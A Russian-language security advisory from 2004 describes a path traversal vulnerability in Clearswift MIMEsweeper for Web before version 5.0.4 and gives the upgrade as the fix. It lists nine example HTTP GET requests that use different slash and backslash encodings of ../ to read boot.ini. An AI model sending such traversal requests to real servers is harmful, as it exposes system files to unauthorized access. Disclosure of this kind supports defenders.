Просмотр произвольных файлов в Clearswift MIMEsweeper

Дата публикации:
15.08.2004
Всего просмотров:
769
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Clearswift MIMEsweeper до версии 5.0.4

Описание: Уязвимость в Clearswift MIMEsweeper для Web позволяет удаленному пользователю просматривать файлы на целевой системе.

Пример:

 
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0

URL производителя: http://www.clearswift.com/products/msw/msw_web/default.aspx

Решение:Установите обновленную версию программы (5.0.4 или более позднюю версию).

Ссылки: Clearswift Mimesweeper Path Traversal Vulnerability

или введите имя

CAPTCHA